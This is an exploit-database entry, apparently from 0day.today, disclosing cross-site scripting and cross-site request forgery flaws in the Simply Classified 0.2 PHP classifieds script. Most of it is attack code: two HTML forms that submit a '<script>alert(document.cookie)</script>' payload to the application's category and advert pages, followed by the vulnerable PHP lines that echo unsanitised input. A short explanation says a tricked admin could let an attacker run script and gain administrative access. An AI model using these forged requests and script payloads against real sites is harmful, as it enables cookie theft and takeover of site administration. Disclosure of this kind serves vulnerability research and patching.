Simply Classified 0.2 XSS & CSRF Vulnerabilities

2010-01-10T00:00:00
ID 1337DAY-ID-10650
Type zdt
Reporter mr_me
Modified 2010-01-10T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ================================================
Simply Classified 0.2 XSS & CSRF Vulnerabilities
================================================


#################################################################
#
# Simply Classified 0.2 XSS & CSRF Vulnerabilities
# Found by: mr_me
# Tested On: Windows Vista
# Note: For educational purposes only
# Author contact date: 16th December 2009

-------------------------------------------------------------------
[+] 1st exploit:
-------------------------------------------------------------------
 
<form name="new_category" action="http://[server]/classified/new_cats.php" method="POST">
<table align="center" width="550" border="0" cellspacing="1" cellpadding="1">
      <tr>
        <input name="category"  type="hidden" value="hacked" size="37" maxlength="30" />
      </tr>
      <tr>
          <input name="description" type="hidden" value="<script>alert(document.cookie)</script>" size="40" maxlength="40" />
    </tr>
    <tr>
        <input type="submit" name="Create" id="Create" value="Create" >
    </tr>
</table>
</form>
 
-------------------------------------------------------------------
[+] Vulnerability details:
-------------------------------------------------------------------
 
The author directly includes user controlled php variable into the HTML page ($ar and $description).
 
edit_cats.php - line 86:
<td align="center">Description:
    <input name="description" type="text" value="<?php echo "$description";?>" autocomplete="off" size="40" maxlength="40" />
    </td>
</tr>
     
     
edit_adverts.php - line 120:
<td colspan="2" align="center" style="font-size:14px"><?php echo "<b>$ar</b>"; ?> </td>
 
 
In order to trigger the vulnerability, a user/admin must be tricked into clicking on a malicous url.
This would allow a hacker to execute javascript code in the context of the user/admin and possibly gain administration access.
 
-------------------------------------------------------------------
[+] 2nd exploit:
-------------------------------------------------------------------
 
<form name="get_advert" action="http://[server]/classified/edit_advert.php" method="post">
    <select name="advert_no" size="1">
        <option value="<script>alert(document.cookie)</script>">editme :)
<input type="submit" name="Go" id="Go" value="Go" >
</form>



#  0day.today [2018-01-02]  #